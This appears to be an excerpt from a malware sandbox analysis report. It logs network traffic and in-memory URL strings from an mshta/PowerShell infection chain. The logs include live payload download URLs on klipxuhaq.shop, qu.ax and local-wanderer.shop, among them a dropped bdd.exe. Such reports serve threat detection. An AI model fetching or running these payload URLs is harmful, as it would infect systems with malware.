Source: global trafficHTTP traffic detected: GET /BUX6P.mp4 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: static.klipxuhaq.shopConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /BUX6P.mp4 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: static.klipxuhaq.shopConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Mcyga.pdf HTTP/1.1Host: qu.axConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /bdd.exe HTTP/1.1Host: denek.local-wanderer.shopConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: static.klipxuhaq.shop
Source: global trafficDNS traffic detected: DNS query: qu.ax
Source: global trafficDNS traffic detected: DNS query: denek.local-wanderer.shop
Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
Source: bdd.exe, 00000012.00000002.1739463600.0000000005435000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ascstats.iobit.com/base-info.php
Source: powershell.exe, 00000009.00000002.1707322439.0000022233771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1806799060.00000222451BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1806799060.00000222441CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1707322439.0000022233801000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000002.1739463600.0000000006071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: powershell.exe, 00000009.00000002.1806799060.00000222451BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1806799060.00000222441CB000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000002.1739463600.0000000006071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0K
Source: powershell.exe, 00000009.00000002.1707322439.0000022233771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1806799060.00000222451BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1806799060.00000222441CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1707322439.0000022233801000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000002.1739463600.0000000006071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: powershell.exe, 00000009.00000002.1707322439.0000022233771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1806799060.00000222451BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1806799060.00000222441CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1707322439.0000022233801000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000002.1739463600.0000000006071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: powershell.exe, 00000009.00000002.1707322439.0000022233771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1806799060.00000222451BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1806799060.00000222441CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1707322439.0000022233801000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000002.1739463600.0000000006071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: powershell.exe, 00000009.00000002.1942545942.000002224B79C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
Source: svchost.exe, 00000008.00000002.2615696935.00000140E2E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: powershell.exe, 00000009.00000002.1707322439.0000022233771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1806799060.00000222451BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1806799060.00000222441CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1707322439.0000022233801000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000002.1739463600.0000000006071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: powershell.exe, 00000009.00000002.1806799060.00000222451BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1806799060.00000222441CB000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000002.1739463600.0000000006071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: powershell.exe, 00000009.00000002.1707322439.0000022233771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1806799060.00000222451BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1806799060.00000222441CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1707322439.0000022233801000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000002.1739463600.0000000006071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: powershell.exe, 00000009.00000002.1707322439.0000022233771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1806799060.00000222451BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1806799060.00000222441CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1707322439.0000022233801000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000002.1739463600.0000000006071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: bdd.exe, 00000012.00000002.1739463600.0000000006071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: powershell.exe, 00000009.00000002.1707322439.0000022233771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1806799060.00000222451BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1806799060.00000222441CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1707322439.0000022233801000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000002.1739463600.0000000006071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: powershell.exe, 00000009.00000002.1707322439.0000022235050000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://denek.local-wanderer.shop
Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: qmgr.db.8.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000009.00000002.1806799060.00000222435EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1806799060.0000022244580000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000000.1691018560.0000000000471000.00000020.00000001.01000000.0000000F.sdmp, bdd.exe, 00000012.00000002.1739463600.0000000005435000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/
Source: powershell.exe, 00000009.00000002.1806799060.00000222435EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1806799060.0000022244580000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000000.1691018560.0000000000471000.00000020.00000001.01000000.0000000F.sdmp, bdd.exe, 00000012.00000002.1739463600.0000000005435000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/
Source: bdd.exe, 00000012.00000002.1739463600.0000000005435000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ipinfo.io/
Source: powershell.exe, 00000009.00000002.1806799060.00000222435EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1806799060.0000022244580000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000000.1691018560.0000000000471000.00000020.00000001.01000000.0000000F.sdmp, bdd.exe, 00000012.00000002.1739463600.0000000005435000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://isr.itopupdate.com/check.php
Source: powershell.exe, 00000009.00000002.1806799060.0000022243366000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000009.00000002.1707322439.0000022233771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1806799060.00000222451BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1806799060.00000222441CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1707322439.0000022233801000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000002.1739463600.0000000006071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: powershell.exe, 00000009.00000002.1707322439.0000022233771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1806799060.00000222451BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1806799060.00000222441CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1707322439.0000022233801000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000002.1739463600.0000000006071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
Source: powershell.exe, 00000009.00000002.1707322439.0000022233771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1806799060.00000222451BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1806799060.00000222441CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1707322439.0000022233801000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000002.1739463600.0000000006071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
Source: powershell.exe, 00000009.00000002.1806799060.00000222451BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1806799060.00000222441CB000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000002.1739463600.0000000006071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
Source: powershell.exe, 00000009.00000002.1707322439.0000022233771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1806799060.00000222451BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1806799060.00000222441CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1707322439.0000022233801000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000002.1739463600.0000000006071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
Source: powershell.exe, 00000009.00000002.1707322439.0000022233518000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000009.00000002.1707322439.0000022234F80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1707322439.0000022233775000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1707322439.0000022234F84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pyfpdf.googlecode.com/)
Source: powershell.exe, 00000009.00000002.1707322439.0000022234F5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://qu.ax
Source: powershell.exe, 00000009.00000002.1806799060.00000222435EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1806799060.0000022244580000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000000.1691018560.0000000000471000.00000020.00000001.01000000.0000000F.sdmp, bdd.exe, 00000012.00000002.1739463600.0000000005435000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: bdd.exe, 00000012.00000002.1739463600.0000000005435000.00000004.00000020.00020000.00000000.sdmp, bdd.exe.9.drString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: powershell.exe, 00000004.00000002.1384908194.000001E18A7E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1376851534.000002C5ADFF5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1707322439.00000222332F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: bdd.exe.9.drString found in binary or memory: http://www.CCAVC.com
Source: bdd.exe.9.drString found in binary or memory: http://www.DelphiFFmpeg.com
Source: powershell.exe, 00000009.00000002.1707322439.0000022233518000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000009.00000002.1806799060.00000222435EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1806799060.0000022244580000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000000.1691018560.0000000000471000.00000020.00000001.01000000.0000000F.sdmp, bdd.exe, 00000012.00000002.1739463600.0000000005435000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/Types
Source: powershell.exe, 00000009.00000002.1707322439.0000022233771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1806799060.00000222451BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1806799060.00000222441CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1707322439.0000022233801000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000002.1739463600.0000000006071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
Source: bdd.exe, 00000012.00000002.1820624736.0000000006DCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.info-zip.org/
Source: powershell.exe, 00000009.00000002.1937029236.000002224B51C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000004.00000002.1384908194.000001E18A76B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1384908194.000001E18A7B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1376851534.000002C5ADFCE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1376851534.000002C5ADFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1707322439.00000222332F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000009.00000002.1806799060.00000222435EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1806799060.0000022244580000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000000.1691018560.0000000000471000.00000020.00000001.01000000.0000000F.sdmp, bdd.exe, 00000012.00000002.1739463600.0000000005435000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/vs/17/release/vc_redist.x64.exe
Source: powershell.exe, 00000009.00000002.1806799060.0000022243366000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000009.00000002.1806799060.0000022243366000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000009.00000002.1806799060.0000022243366000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000009.00000002.1707322439.0000022234F84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://denek.lo
Source: powershell.exe, 00000009.00000002.1707322439.0000022233779000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1707322439.0000022234F84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://denek.local-wanderer.shop
Source: powershell.exe, 00000009.00000002.1707322439.0000022233779000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1707322439.0000022234F84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://denek.local-wanderer.shop/bdd.exep
Source: powershell.exe, 00000009.00000002.1707322439.0000022234F84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://denek.local-wanderer.shop/bdd.exe~
Source: powershell.exe, 00000009.00000002.1707322439.0000022234F84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://denek.local-wanderer.shopxJ
Source: svchost.exe, 00000008.00000003.1406439123.00000140E307A000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.drString found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
Source: svchost.exe, 00000008.00000003.1406439123.00000140E3000000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
Source: powershell.exe, 00000009.00000002.1707322439.0000022233518000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000009.00000002.1707322439.0000022234338000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000005.00000002.1378908181.000002C5C612D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
Source: powershell.exe, 00000009.00000002.1806799060.00000222435EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1806799060.0000022244580000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000000.1691018560.0000000000471000.00000020.00000001.01000000.0000000F.sdmp, bdd.exe, 00000012.00000002.1739463600.0000000005435000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://goto.itopupdate.com/appgoto?name=isr
Source: powershell.exe, 00000009.00000002.1806799060.00000222435EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1806799060.0000022244580000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000000.1691018560.0000000000471000.00000020.00000001.01000000.0000000F.sdmp, bdd.exe, 00000012.00000002.1739463600.0000000005435000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://goto.itopupdate.com/online
Source: powershell.exe, 00000009.00000002.1806799060.0000022243366000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000009.00000002.1707322439.0000022233518000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1707322439.0000022234D38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://qu.ax
Source: powershell.exe, 00000009.00000002.1707322439.0000022234D38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://qu.ax/Mc
Source: powershell.exe, 00000009.00000002.1707322439.0000022234D38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://qu.ax/Mcyg
Source: powershell.exe, 00000009.00000002.1707322439.0000022233518000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://qu.ax/Mcyga.pdf0
Source: powershell.exe, 00000009.00000002.1707322439.0000022234D38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://qu.ax/Mcyga.pdfp
Source: powershell.exe, 00000009.00000002.1806799060.00000222435EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1806799060.0000022244580000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000000.1691018560.0000000000471000.00000020.00000001.01000000.0000000F.sdmp, bdd.exe, 00000012.00000002.1739463600.0000000005435000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s3.amazonaws.com/myfilelist/list
Source: powershell.exe, 00000005.00000002.1376851534.000002C5AE418000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1376851534.000002C5AE473000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.k
Source: powershell.exe, 00000005.00000002.1376851534.000002C5AE418000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.kX
Source: mshta.exe, 00000006.00000003.1964217583.0000020922CFF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1967165870.0000020922CFF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1957763371.0000020922CFF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1970541609.0000020922D00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/
Source: powershell.exe, 00000004.00000002.1384908194.000001E18AC5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.
Source: mshta.exe, 00000006.00000002.1970382739.0000020922C9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.mp4
Source: mshta.exe, 00000006.00000003.1959271288.0000020922C7C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1970346353.0000020922C7D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1964382319.0000020922C7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.mp4#
Source: powershell.exeString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.mp4$global:?
Source: mshta.exe, 00000006.00000003.1959271288.0000020922C7C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1970346353.0000020922C7D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1964382319.0000020922C7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.mp4%
Source: mshta.exe, 00000006.00000003.1959746334.00000211297C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1973901014.00000211297D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1957714093.00000211297B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1963585533.00000211297D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1972320693.0000021125880000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.mp4...
Source: mshta.exe, 00000006.00000002.1972320693.0000021125880000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.mp4...-e
Source: mshta.exe, 00000006.00000003.1959746334.00000211297C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1973901014.00000211297D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1957714093.00000211297B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1963585533.00000211297D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.mp4...e35
Source: mshta.exe, 00000006.00000003.1959746334.00000211297C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1973901014.00000211297D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1957714093.00000211297B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1963585533.00000211297D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.mp4...l34
Source: mshta.exe, 00000006.00000003.1964328816.0000021125951000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1973504184.0000021125952000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1963613386.0000021125944000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1958581219.0000021125944000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1958103572.0000021125944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.mp4.0
Source: powershell.exe, 00000005.00000002.1376771546.000002C5AC410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.mp42
Source: mshta.exe, 00000006.00000003.1966405671.0000021129AFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.mp488
Source: mshta.exe, 00000006.00000003.1957853761.0000020922C9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1970382739.0000020922C9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.mp49q
Source: mshta.exe, 00000006.00000002.1970243917.0000020922C66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.mp4=
Source: mshta.exe, 00000006.00000003.1966405671.0000021129AFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.mp4==
Source: mshta.exe, 00000006.00000003.1966574976.0000021129DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.mp4=https://static.klipxuhaq.shop/BUX6P.mp413
Source: powershell.exe, 00000005.00000002.1379311416.000002C5C61E5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1970243917.0000020922C40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.mp4C:
Source: mshta.exe, 00000006.00000002.1970629876.0000020922E30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.mp4H
Source: mshta.exe, 00000006.00000002.1974643766.000002112992F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.mp4LMEMP
Source: powershell.exe, 00000005.00000002.1376715646.000002C5AC3E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.mp4O
Source: powershell.exe, 00000005.00000002.1376260508.000002C5AC1D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.mp4P
Source: mshta.exe, 00000006.00000003.1957853761.0000020922C9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1970382739.0000020922C9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.mp4Qq
Source: mshta.exe, 00000006.00000002.1974902714.000002112A220000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.mp4W
Source: mshta.exe, 00000006.00000003.1959271288.0000020922C7C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1970346353.0000020922C7D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1964382319.0000020922C7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.mp4cC8
